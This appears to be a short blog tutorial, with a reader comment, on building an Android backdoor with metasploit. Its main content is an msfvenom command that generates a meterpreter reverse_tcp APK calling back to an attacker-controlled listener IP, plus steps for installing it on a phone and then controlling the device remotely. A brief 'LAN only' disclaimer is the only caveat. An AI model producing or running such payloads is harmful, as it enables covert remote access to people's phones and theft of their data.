Creating a backdoor exploit for android is very easy using metasploit:
(I'll create here for connection on a lan/plan network so that you don't do mischiefs with others on the internet)
- First create the backdoor apk in your linux(Kali) terminal using: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/backdoor.apk
- Now you'll get an apk file named backdoor.apk in your home directory. Install it in your phone connected with the same network as you PC on your wlan(wifi).
- Now You can acess almost anything of your phone through the metasploit terminal in linux(Kali).
Now, view a list of all possible actions/commands for the app using:
help
Join our telegram channel
Back to home page
Good post and thank you
ReplyDelete